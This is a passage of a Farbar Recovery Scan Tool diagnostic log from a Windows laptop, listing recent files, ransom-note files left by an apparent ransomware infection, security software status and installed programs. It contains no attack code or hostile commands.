Ps2Kb2Hid; C:\Windows\System32\drivers\aPs2Kb2Hid.sys [26736 2013-01-26] (Dritek System Inc.) ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-10-17 11:20 - 2014-10-17 11:20 - 00000000 ____D () C:\FRST 2014-10-17 11:19 - 2014-10-17 11:20 - 00000000 ____D () C:\Users\jalockma\Desktop\Jbrown Recovery 2014-10-17 07:58 - 2014-10-17 07:59 - 00002186 _____ () C:\Users\jalockma\Desktop\Rkill.txt 2014-10-17 07:56 - 2014-10-17 07:56 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee 2014-10-17 07:55 - 2014-10-17 07:59 - 00000000 ____D () C:\temp 2014-10-16 14:54 - 2014-10-17 08:01 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-10-16 14:54 - 2014-10-16 14:54 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2014-10-16 14:54 - 2014-10-16 14:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2014-10-16 14:53 - 2014-10-16 14:54 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware 2014-10-16 14:53 - 2014-10-16 14:53 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-10-16 14:53 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-10-16 14:53 - 2014-10-01 11:11 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-10-16 14:53 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-10-12 22:12 - 2014-10-16 16:16 - 00000000 ____D () C:\Users\jalockma\AppData\Roaming\Lekuaxuc 2014-10-12 22:12 - 2014-10-16 16:13 - 00000000 ____D () C:\Users\jalockma\AppData\Roaming\Isaholy 2014-10-12 22:11 - 2014-10-12 22:11 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage 2014-10-07 21:57 - 2014-10-07 21:57 - 00008224 _____ () C:\Users\jalockma\DECRYPT_INSTRUCTION.HTML 2014-10-07 21:57 - 2014-10-07 21:57 - 00004156 _____ () C:\Users\jalockma\DECRYPT_INSTRUCTION.TXT 2014-10-07 21:57 - 2014-10-07 21:57 - 00000276 _____ () C:\Users\jalockma\DECRYPT_INSTRUCTION.URL 2014-10-07 21:33 - 2014-10-07 21:33 - 00008224 _____ () C:\Users\jalockma\Downloads\DECRYPT_INSTRUCTION.HTML 2014-10-07 21:33 - 2014-10-07 21:33 - 00008224 _____ () C:\Users\jalockma\Documents\DECRYPT_INSTRUCTION.HTML 2014-10-07 21:33 - 2014-10-07 21:33 - 00004156 _____ () C:\Users\jalockma\Downloads\DECRYPT_INSTRUCTION.TXT 2014-10-07 21:33 - 2014-10-07 21:33 - 00004156 _____ () C:\Users\jalockma\Documents\DECRYPT_INSTRUCTION.TXT 2014-10-07 21:33 - 2014-10-07 21:33 - 00000276 _____ () C:\Users\jalockma\Downloads\DECRYPT_INSTRUCTION.URL 2014-10-07 21:33 - 2014-10-07 21:33 - 00000276 _____ () C:\Users\jalockma\Documents\DECRYPT_INSTRUCTION.URL 2014-10-07 21:29 - 2014-10-07 21:29 - 00008224 _____ () C:\Users\jalockma\AppData\Roaming\DECRYPT_INSTRUCTION.HTML 2014-10-07 21:29 - 2014-10-07 21:29 - 00008224 _____ () C:\Users\jalockma\AppData\Local\DECRYPT_INSTRUCTION.HTML 2014-10-07 21:29 - 2014-10-07 21:29 - 00008224 _____ () C:\Users\jalockma\AppData\DECRYPT_INSTRUCTION.HTML 2014-10-07 21:29 - 2014-10-07 21:29 - 00004156 _____ () C:\Users\jalockma\AppData\Roaming\DECRYPT_INSTRUCTION.TXT 2014-10-07 21:29 - 2014-10-07 21:29 - 00004156 _____ () C:\Users\jalockma\AppData\Local\DECRYPT_INSTRUCTION.TXT 2014-10-07 21:29 - 2014-10-07 21:29 - 00004156 _____ () C:\Users\jalockma\AppData\DECRYPT_INSTRUCTION.TXT 2014-10-07 21:29 - 2014-10-07 21:29 - 00000276 _____ () C:\Users\jalockma\AppData\Roaming\DECRYPT_INSTRUCTION.URL 2014-10-07 21:29 - 2014-10-07 21:29 - 00000276 _____ () C:\Users\jalockma\AppData\Local\DECRYPT_INSTRUCTION.URL 2014-10-07 21:29 - 2014-10-07 21:29 - 00000276 _____ () C:\Users\jalockma\AppData\DECRYPT_INSTRUCTION.URL 2014-10-07 21:26 - 2014-10-07 21:26 - 00008224 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML 2014-10-07 21:26 - 2014-10-07 21:26 - 00004156 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT 2014-10-07 21:26 - 2014-10-07 21:26 - 00000276 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL 2014-09-25 18:14 - 2014-10-07 21:30 - 00000000 ____D () C:\Users\jalockma\Documents\Gardening and Growing 2014-09-25 18:12 - 2014-10-07 21:29 - 00000000 ____D () C:\Users\jalockma\Documents\Bishop McCarthy 2014-09-25 18:08 - 2014-10-07 21:33 - 00000000 ____D () C:\Users\jalockma\Documents\NJ FamilyCare Info ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-10-17 10:26 - 2014-04-08 21:26 - 00000941 _____ () C:\Windows\Tasks\EPSON XP-310 Series Update {901D3D34-B261-4978-B173-D1F87C7D7DE3}.job 2014-10-17 10:26 - 2014-04-08 21:26 - 00000755 _____ () C:\Windows\Tasks\EPSON XP-310 Series Invitation {901D3D34-B261-4978-B173-D1F87C7D7DE3}.job 2014-10-17 10:00 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\system32\sru 2014-10-17 08:28 - 2013-04-02 06:02 - 00003598 _____ () C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2604008792-1424924497-987845697-1001 2014-10-17 07:56 - 2012-12-20 06:30 - 00001848 _____ () C:\Users\Public\Desktop\McAfee Internet Security Suite.lnk 2014-10-17 07:55 - 2013-01-26 09:56 - 01244872 _____ () C:\Windows\WindowsUpdate.log 2014-10-17 07:48 - 2013-05-06 14:38 - 00000000 ____D () C:\Users\jalockma\AppData\Local\CrashDumps 2014-10-16 22:28 - 2012-12-20 05:31 - 00098780 _____ () C:\Windows\PFRO.log 2014-10-16 22:28 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\PLA 2014-10-16 22:28 - 2012-07-26 03:22 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-10-16 22:28 - 2012-07-26 01:26 - 00524288 ___SH () C:\Windows\system32\config\BBI 2014-10-16 20:36 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\rescache 2014-10-16 17:43 - 2013-04-05 11:43 - 00001607 _____ () C:\Users\jalockma\Desktop\ACERLAPTOP - Shortcut.lnk 2014-10-16 17:27 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\system32\FxsTmp 2014-10-16 16:16 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\schemas 2014-10-16 15:31 - 2012-12-20 06:28 - 00000000 ____D () C:\Program Files (x86)\McAfee 2014-10-16 15:31 - 2012-07-26 01:26 - 00262144 ___SH () C:\Windows\system32\config\ELAM 2014-10-16 15:19 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\Performance 2014-10-16 15:17 - 2012-07-25 22:16 - 00000000 __SHD () C:\Users\jalockma\AppData\Roaming\chwhhwdd 2014-10-16 14:54 - 2012-07-26 03:28 - 00848230 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-10-16 14:53 - 2012-07-26 03:21 - 00028847 _____ () C:\Windows\setupact.log 2014-10-12 21:55 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\system32\NDF 2014-10-12 12:43 - 2014-01-13 15:03 - 00007602 _____ () C:\Users\jalockma\AppData\Local\resmon.resmoncfg 2014-10-08 13:30 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\AUInstallAgent 2014-10-08 13:29 - 2013-04-02 05:55 - 00000000 ____D () C:\Users\jalockma\AppData\Local\Packages 2014-10-08 13:28 - 2013-04-02 09:11 - 00000000 ____D () C:\Users\jalockma\AppData\Local\clear.fi 2014-10-07 21:57 - 2013-04-02 05:55 - 00000000 ____D () C:\Users\jalockma 2014-10-07 21:33 - 2014-04-30 13:40 - 00000000 ____D () C:\Users\jalockma\Documents\Recipes 2014-10-07 21:33 - 2013-12-01 11:21 - 00000000 ____D () C:\Users\jalockma\Documents\NJ Unemployment Claim 2014-10-07 21:33 - 2013-09-17 15:06 - 00000000 ____D () C:\Users\jalockma\Documents\Obamacare Info 2014-10-07 21:33 - 2013-04-12 11:10 - 00000000 ____D () C:\Users\jalockma\Documents\PA Unemployment Claim 2014-10-07 21:33 - 2013-04-11 22:56 - 00000000 ____D () C:\Users\jalockma\Documents\Phonebook 2014-10-07 21:33 - 2013-04-11 22:56 - 00000000 ____D () C:\Users\jalockma\Documents\Performance Objectives and Committments 2014-10-07 21:32 - 2013-04-11 22:56 - 00000000 ____D () C:\Users\jalockma\Documents\My Stuff 2014-10-07 21:32 - 2013-04-11 22:56 - 00000000 ____D () C:\Users\jalockma\Documents\Lockheed 2014-10-07 21:31 - 2014-06-12 17:27 - 00000000 ____D () C:\Users\jalockma\Documents\Jokes 2014-10-07 21:31 - 2013-04-11 22:54 - 00000000 ____D () C:\Users\jalockma\Documents\Keepers 2014-10-07 21:31 - 2013-04-11 22:54 - 00000000 ____D () C:\Users\jalockma\Documents\Jobs 2014-10-07 21:31 - 2013-04-11 22:54 - 00000000 ____D () C:\Users\jalockma\Documents\Investing 2014-10-07 21:30 - 2013-05-17 19:54 - 00000000 ____D () C:\Users\jalockma\Documents\ED2Go Course Plants for Fun N Profit 2014-10-07 21:30 - 2013-04-11 22:54 - 00000000 ____D () C:\Users\jalockma\Documents\Income Taxes 2014-10-07 21:29 - 2013-09-17 15:10 - 00000000 ____D () C:\Users\jalockma\Documents\Computer Info 2014-10-07 21:29 - 2013-06-06 11:12 - 00000000 ____D () C:\Users\jalockma\Documents\COBRA Conexis 2014-10-07 21:29 - 2013-04-02 05:56 - 00000000 ____D () C:\Users\jalockma\AppData\Roaming\Adobe 2014-10-07 21:26 - 2013-04-09 00:05 - 00000000 ____D () C:\ProgramData\PopCap Games 2014-10-07 21:26 - 2013-01-26 10:30 - 00000000 ____D () C:\ProgramData\Symantec 2014-10-06 14:00 - 2013-05-16 14:21 - 00000000 ____D () C:\Users\jalockma\AppData\Roaming\Spotify 2014-10-06 13:28 - 2012-12-20 06:25 - 00000000 ____D () C:\ProgramData\WildTangent 2014-10-06 13:28 - 2012-12-20 06:25 - 00000000 ____D () C:\Program Files (x86)\WildGames 2014-09-25 18:28 - 2013-04-02 20:45 - 00000000 ____D () C:\Users\jalockma\Documents\Bluetooth Folder ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signed C:\Windows\System32\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\System32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\System32\services.exe => File is digitally signed C:\Windows\System32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\System32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\System32\rpcss.dll => File is digitally signed C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-10-06 12:51 ==================== End Of Log ============================ Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16-10-2014 Ran by jalockma at 2014-10-17 11:21:13 Running from C:\Users\jalockma\Desktop\Jbrown Recovery Boot Mode: Normal ========================================================== ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892} AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {16C7C823-5972-5907-58FA-0004E2F9422F} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} FW: McAfee Firewall (Enabled) {959DA8E2-3527-57D1-4915-924367AD4FE9} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) clear.fi SDK - Video 2 (x32 Version: 2.1.2128 - CyberLink Corp.) Hidden clear.fi SDK- Movie 2 (x32 Version: 2.1.2112 - CyberLink Corp.) Hidden Acer Backup Manager (HKLM-x32\...\InstallShield_{9DDDF20E-9FD1-4434-A43E-E7889DBC9420}) (Version: 4.0.0.0071 - NTI Corporation) Acer Device Fast-lane (HKLM\...\{3F62D2FD-13C1-49A2-8B5D-47623D9460D7}) (Version: 1.00.3011 - Acer Incorporated) Acer Instant Update Service (HKLM\...\{8215A318-CC27-435E-B3EA-2E3443C8998C}) (Version: 1.00.3013 - Acer Incorporated) Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3011 - Acer Incorporated) Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3012 - Acer Incorporated) AcerCloud (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.01.3125 - Acer Incorporated) AcerCloud Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.00.3204 - Acer Incorporated) Adobe Reader XI (11.0.05) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.05 - Adobe Systems Incorporated) Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.5.146 - Adobe Systems, Inc.) Ask Toolbar (HKLM-x32\...\{4F524A2D-5637-006A-76A7-A758B70C1101}) (Version: 12.17.1.75 - APN, LLC) <==== ATTENTION Backup Manager v4 (x32 Version: 4.0.0.0071 - NTI Corporation) Hidden Bejeweled 2 Deluxe (HKLM-x32\...\Bejeweled 2 Deluxe) (Version: - PopCap Games) Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden clear.fi Media (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.01.3112 - Acer Incorporated) clear.fi Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.01.3109 - Acer Incorporated) CyberLink MediaEspresso 6.5 (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.5.3318_45364 - CyberLink Corp.) CyberLink MediaEspresso 6.5 (x32 Version: 6.5.3318_45364 - CyberLink Corp.) Hidden Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{2433A103-9EC3-49EA-9AD1-58A35F27EE56}) (Version: - Microsoft) Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.16 - Dolby Laboratories Inc) eBay Worldwide (HKLM-x32\...\{A694AF57-9891-4D62-824C-7E55A1361A14}) (Version: 2.3.0630 - OEM) EPSON Connect version 1.0 (HKLM-x32\...\EPSON Connect_is1) (Version: 1.0 - Epson America Inc.) Epson Customer Participation (HKLM\...\{814FA673-A085-403C-9545-747FC1495069}) (Version: 1.6.3.0 - SEIKO EPSON CORPORATION) Epson Event Manager (HKLM-x32\...\{2970697F-2A11-4588-8B7F-97322D1CCF3C}) (Version: 3.10.0017 - Seiko Epson Corporation) Epson E-Web Print (HKLM-x32\...\{CEC98C2A-9ED5-49DA-9F3A-92434E0A4FA3}) (Version: 1.19.0000 - SEIKO EPSON CORPORATION) EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - Seiko Epson Corporation) EPSON XP-310 Series Printer Uninstall (HKLM\...\EPSON XP-310 Series) (Version: - SEIKO EPSON Corporation) EpsonNet Print (HKLM-x32\...\{3E31400D-274E-4647-916C-2CACC3741799}) (Version: 2.6.0 - SEIKO EPSON CORPORATION) ETDWare PS/2-X64 11.6.16.003_WHQL (HKLM\...\Elantech) (Version: 11.6.16.003 - ELAN Microelectronic Corp.) Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3004 - Acer Incorporated) Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation) Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2867 - Intel Corporation) Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.5.4.1001 - Intel Corporation) Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation) Intel® Trusted Connect Service Client (Version: 1.24.388.1 - Intel Corporation) Hidden Java 7 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.510 - Oracle) Java Auto Updater (x32 Version: 2.1.9.8 - Sun Microsystems, Inc.) Hidden Launch Manager (HKLM-x32\...\LManager) (Version: 7.0.10 - Acer Inc.) Live Updater (HKLM-x32\...\{EE26E302-876A-48D9-9058-3129E5B99999}) (Version: 2.00.3006 - Acer Incorporated) LTCM Client (HKLM-x32\...\{B38E9B55-7136-4E66-A084-320512FF3F6F}) (Version: 1.20.3792 - Leader Technologies Inc) Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation) McAfee Internet Security Suite (HKLM-x32\...\MSC) (Version: 12.8.988 - McAfee, Inc.) McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.130.10 - McAfee, Inc.) McAfee SiteAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 3.7.143 - McAfee, Inc.) Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Microsoft Office 2010 Service Pack 1 (SP1) (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version: - Microsoft) Microsoft Office 2010 Service Pack 1 (SP1) (x32 Version: - Microsoft) Hidden Microsoft Office Access MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Access Setup Metadata MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Excel MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Groove MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office InfoPath MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Office 64-bit Components 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office OneNote MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Outlook MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office PowerPoint MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.6029.1000 - Microsoft Corporation) Microsoft Office Professional Plus 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Proof (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Proof (French) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Proof (Spanish) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Proofing (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Publisher MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Shared 64-bit MUI (English) 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Shared MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Shared Setup Metadata MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Word MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20513.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{402ED4A1-8F5B-387A-8688-997ABF58B8F2}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual Studio 2005 Tools for Office Runtime (x32 Version: 8.0.60940.0 - Microsoft Corporation) Hidden MyWinLocker (Version: 4.0.14.35 - Egis Technology Inc.) Hidden MyWinLocker 4 (x32 Version: 4.0.14.35 - Egis Technology Inc.) Hidden MyWinLocker Suite (HKLM-x32\...\InstallShield_{17DF9714-60C9-43C9-A9C2-32BCAED44CBE}) (Version: 4.0.14.24 - Egis Technology Inc.) MyWinLocker Suite (x32 Version: 4.0.14.24 - Egis Technology Inc.) Hidden Norton Online Backup (HKLM-x32\...\{40A66DF6-22D3-44B5-A7D3-83B118A2C0DC}) (Version: 2.2.3.51r - Symantec Corporation) Norton Online Backup ARA (x32 Version: 4.1.0.14 - Symantec Corporation) Hidden NTI Media Maker 9 (HKLM-x32\...\InstallShield_{D3D5C4E8-040F-4C6F-8105-41D43CF94F44}) (Version: 9.0.2.9014 - NTI Corporation) NTI Media Maker 9 (x32 Version: 9.0.2.9014 - NTI Corporation) Hidden Office Addin (HKLM-x32\...\{6D2BBE1D-E600-4695-BA37-0B0E605542CC}) (Version: 2.01.3202 - Acer) Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.220 - Qualcomm Atheros Communications) Qualcomm Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 2.1.0.7 - Qualcomm Atheros Communications Inc.) Qualcomm Atheros WLAN and Bluetooth Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 11.41 - Qualcomm Atheros) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6695 - Realtek Semiconductor Corp.) Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.2.8400.28124 - Realtek Semiconductor Corp.) Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee) Shredder (Version: 2.0.8.9 - Egis Technology Inc.) Hidden Shredder (x32 Version: 2.0.8.9 - Egis Technology Inc.) Hidden Software Updater (HKLM-x32\...\{C09D747A-BD47-42A9-915E-CEB6B1BB7C11}) (Version: 4.2.7 - SEIKO EPSON CORPORATION) Spotify (HKLM-x32\...\Spotify) (Version: 0.8.4.99.ga249b5f1 - Spotify AB) swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}) (Version: - Microsoft) Update for Microsoft Filter Pack 2.0 (KB2810071) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{001E8BF3-EDC3-4D5E-9C11-1D0E599B6497}) (Version: - Microsoft) Update for Microsoft Filter Pack 2.0 (KB2810071) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{001E8BF3-EDC3-4D5E-9C11-1D0E599B6497}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2553065) (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{A8686D24-1E89-43A1-973E-05A258D2B3F8}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2553157) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{97C39B81-3054-4AB4-B11D-A656DE619982}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2553181) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{48E1B6C2-7299-4F3F-AA63-42F0ACE55AA4}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2553267) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{18B3CF2A-73F7-4716-B1AE-86D68726D408}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2553310) 32-Bit Edition (HKLM-x32\...\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{73E67A3A-8D61-44EF-90C2-1697C3DBE668}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2566458) (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{EFB525A0-E1C0-4E32-9968-FE401BC87363}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2589370) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{150A0FF0-AF69-4132-BD93-1E34F63FC8A3}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{287A1E92-9E41-4BC1-8920-B3D0E9220800}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2596964) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{ED31DE9A-3E13-4E2C-9106-E0D8AFFB9FA6}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2598242) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{C4F26A9B-B121-4135-8084-A0D9C780C7C8}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2598242) 32-Bit Edition (HKLM-x32\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUSR_{460FF681-BC66-4C38-99DF-7012E03F1EBA}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2598242) 32-Bit Edition 